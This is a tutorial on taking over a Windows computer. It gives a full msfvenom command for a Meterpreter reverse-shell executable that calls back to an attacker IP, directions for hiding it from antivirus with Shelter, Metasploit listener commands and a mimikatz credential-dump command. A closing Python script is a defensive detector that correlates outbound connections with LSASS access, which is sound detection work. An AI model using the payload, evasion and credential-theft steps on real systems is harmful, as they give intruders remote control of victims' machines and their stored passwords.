How to Hack a Windows Computer with A Simple Payload


Hack a Windows Computer By Using a Simple Payload - Ethical hacking project

Can Windows be hacked? The answer is yes. There are many methods by which Windows can be hacked, and one of them is the payload method. In this ethical hacking project, you will learn to hack Windows using the payload method.


Requirement :

# Kali Linux

# Metasploit

# Shelter 

Let's Start :

We need Metasploit in Kali Linux to create a payload.

What is Metasploit?

It is a framework mostly used by hackers to set up a listener to manipulate machines. We will use this framework in Kali Linux to create a payload for Windows.

Creating a malicious executable (.exe) file:

To create a malicious file, we will use msfvenom.

With this command we create a malicious exe file:


msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/pj.exe

(You can use any name for the .exe.)

The above command instructs msfvenom to generate an executable file that implements a reverse TCP connection for the payload.

Here LHOST is the IP address of our machine.

LPORT is the port on which to listen for the connection from the target.

(If you want to know your IP address, just type ifconfig in the terminal.)

Now the payload is ready, but we still have to bypass the antivirus, so we'll encode it to make it undetectable.

Making it undetectable :

To encode our file we use Shelter, which changes the signature of the file to a new and unique one. But as we know, the antivirus also scans the behavior of the payload file; it scans the file 7-10 times. That is why we are using Shelter to encode the whole file. Also note that while encoding the payload file, disable the automatic submission, otherwise it can be detected by the antivirus.

So to install Shelter in Kali Linux, run the command:

Sudo apt-get install shelter

After running this command, Shelter will initialize, so select 'Y' (yes) when it asks.

After the installation, it will ask you to enter the payload, either listed or custom. Choose listed with 'L'.

After that, select the index position; choose Meterpreter_Reverse_TCP.

After that, it will ask you for the LHOST and LPORT; after entering these, hit Enter.

Then it will run to completion.

Wait for some time; it will provide you an undetectable .exe payload file.

Msf console :

Now, we need to set up the listener on the port.

So type msfconsole in the Kali Linux terminal.

Now use these commands :

# use multi/handler

# set payload windows/meterpreter/reverse_tcp

# set LHOST (your ip)

# set LPORT 4444

# exploit 

After entering these commands in the terminal, the TCP handler starts to wait for the connection.

Now execute the payload on the Windows machine.

After executing the payload on the PC or Windows system, we will receive the Meterpreter session in our Kali Linux terminal.

But it will show access denied in the terminal. So we will check the ID by running the getuid command in the terminal; it will tell you the user ID.

To show that the user lacks privileges, run this command:

mimikatz_command -f sekurlsa::logonPasswords

So you will get access to the PC. If somehow you are not able to gain access, then you need to do UAC bypassing.
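
From the defender's side, the steps above leave two observable events on the Windows host: an executable in a user-writable folder opening an outbound TCP connection, and that same process opening lsass.exe when sekurlsa::logonPasswords runs. The following Python detection logic is an added example, not part of the original article; it correlates the two over constructed events that use Sysmon field names (Event ID 3 and Event ID 10), and the host names, the Downloads path and the allowlist are assumptions.

```python
# Constructed sample events using Sysmon field names (IDs 3 and 10); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 3, "host": "WS01", "Image": r"C:\Users\alice\Downloads\pj.exe",
     "DestinationIp": "192.168.100.4", "DestinationPort": 4444, "Initiated": True},
    {"id": 3, "host": "WS01", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": True},
    {"id": 10, "host": "WS01", "SourceImage": r"C:\Users\alice\Downloads\pj.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"id": 10, "host": "WS02", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")
COMMON_PORTS = {53, 80, 443}
LSASS_ALLOWLIST = ("c:\\windows\\system32\\",)  # assumption: tune per environment


def user_writable(path):
    """True when the image path sits under a directory ordinary users can write to."""
    p = path.lower()
    return any(part in p for part in USER_WRITABLE)


def detect(events):
    """Return a list of (severity, host, image, reason) findings."""
    findings, beacons = [], set()
    for ev in events:
        if ev["id"] == 3 and ev.get("Initiated"):
            img = ev["Image"]
            # Outbound connection on an unusual port from a user-writable location.
            if user_writable(img) and ev["DestinationPort"] not in COMMON_PORTS:
                beacons.add((ev["host"], img.lower()))
                reason = (f"outbound to {ev['DestinationIp']}:{ev['DestinationPort']}"
                          " from user-writable path")
                findings.append(("medium", ev["host"], img, reason))
        elif ev["id"] == 10 and ev["TargetImage"].lower().endswith("\\lsass.exe"):
            src = ev["SourceImage"]
            if src.lower().startswith(LSASS_ALLOWLIST):
                continue  # expected system process
            # Escalate when the same binary was already seen calling out.
            sev = "critical" if (ev["host"], src.lower()) in beacons else "high"
            findings.append((sev, ev["host"], src, "non-system process opened lsass.exe"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The port test is only a heuristic, because LPORT is whatever the operator chose; the LSASS access rule and the correlation between the two events carry most of the signal.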

